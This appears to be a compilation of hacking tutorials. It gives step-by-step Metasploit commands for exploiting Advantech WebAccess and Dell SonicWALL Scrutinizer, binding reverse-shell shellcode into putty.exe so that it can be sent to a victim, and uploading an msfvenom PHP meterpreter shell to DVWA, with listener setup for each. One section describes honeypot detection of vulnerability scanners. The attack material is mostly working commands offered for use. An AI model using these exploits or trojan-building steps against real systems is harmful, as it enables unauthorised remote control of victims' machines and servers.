Exploit Remote PC using Advantech WebAccess Dashboard Viewer upload Image Common Arbitrary File Upload

This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to upload arbitrary code (instead of an image) to the server, which will then be executed under the high-privilege context of the IIS AppPool.

Exploit Targets

Advantech WebAccess 8.0

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/scada/advantech_webaccess_dashboard_file_upload

msf exploit (advantech_webaccess_dashboard_file_upload)>set lhost 192.168.0.108 (IP of Local Host)

msf exploit (advantech_webaccess_dashboard_file_upload)>set rhost 192.168.0.102

msf exploit (advantech_webaccess_dashboard_file_upload)>set rport 80

msf exploit (advantech_webaccess_dashboard_file_upload)>set targeturi /

 msf exploit (advantech_webaccess_dashboard_file_upload)>exploit

Hack Remote Windows PC Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection

This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail parameter in exporters.php allows an attacker to write arbitrary files to the file system with an SQL Injection attack, and gain remote code execution under the context of SYSTEM for Windows, or as Apache for Linux. Authentication is required to exploit this vulnerability, but this module uses the default admin:admin credential.

Exploit Targets

Dell SonicWALL Scrutinizer 11.01

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Now type use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set payload windows/meterpreter/reverse_tcp

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set lhost 192.168.0.108 (IP of Local Host)

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set rhost 192.168.0.120

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>exploit

Hack Remote Windows 10 PC using Cypher (Adding Shellcode to PE files)

First clone cypher repository from github, to do so type:

git clone https://github.com/xan7r/cypher.git

Now choose an executable file and copy to cypher folder to bind the cypher with any .exe file

Here in my case I have copied putty.exe as a file to bind with cipher

Note: only executable file can be binded.

Now run the following command

python addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 -p 0







Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Start metasploit using msfconsole

use exploit/multi/handler

set payload windows/shell_reverse_tcp

set lhost 192.168.0.105

set lport 4444

exploit

Now send the binded putty_evil .exe to the victim, as soon as he opens the file a shell session will open

Detect Vulnerability Scanner in Network using Kfsensor

In the previous article, we have seen that how KFSensorHoneypot IDS detects any unauthorized person by simulating vulnerable system services. Well, vulnerability to a hacker is like jewels. Every hacker or malicious person  fist face of hacking is Footprinting and second is scanning where they get to know whether a system is vulnerable for performing an attack or not. So in this article, we will detect an unauthorized person or a hacker and stop it.

Install and start KFSensorHoneypot IDS server to do this read my previous article

http://www.hackingarticles.in/detect-hacker-network-using-kfsensor-honeypot

Here my KFSensorHoneypot is ready.

Scanning phase tells us whether systems is vulnerable or not and sometimes even provide us exploit information which is available for that vulnerability. So every of the hacker performs this step before exploiting your system.

 So here I try to scan my system running KFSensor with Nessus vulnerability scanner from another computer.

As you can see Nessus started scanning my system and finding the vulnerability.

Here you can see that KFSensorHoneypot IDS alerted you that someone is trying to scan your system for vulnerability and some of the packets your system is receiving are malicious and recorded attackers IP address.

Now I’m trying to scan my system with GFI Languard also to see that KFSensorIDS detect or not.

GFI Languard started scanning.

Here KFSensorHoneypot IDS alerted that someone is sending packets to get vulnerability of the system. Here you can monitor attacks on every TCP and UDP ports. Even you can see ICMP or ping messages.

Here you can see that someone is trying attacking on Port and his IP address is 192.168.149.1

You can also view alerts by visitor’s means which IP address is trying to access onwhich ports.

KfsensorHoneypot IDS can also detect whether someone is using a Vulnerability scanner or not to perform an attack on your system. Now we know that particular IP address is sending to many packets which are not good. So to block that IP address we have to create a separate policy for that visitor.

To do that double-click on IP address you want to block accessing your system, a menu will appear.

Now click on details.

Here click on Create Visitor Ruleto create a policy.

After that select port, you want to block for that IP address and select actions Close or Ignore all requests from that particular IP address.

Web Server Penetration with DVWA and Metasploit (Beginner Guide)

Open your kali linux terminal and type

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw

It will generate a raw code of php file

Now copy the generated code in the text file and save it on your desktop with .php extension

Now open the DVWA Webapp in your server and login with following credentials:

Username - admin

Password - password

Now scroll to the File Upload section in left pane and upload the above created php file

When you will finish uploading your php file, it will show you the path

Now open your uploaded file in browser

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.140

set lport 4444

exploit

Now you can access the victim's server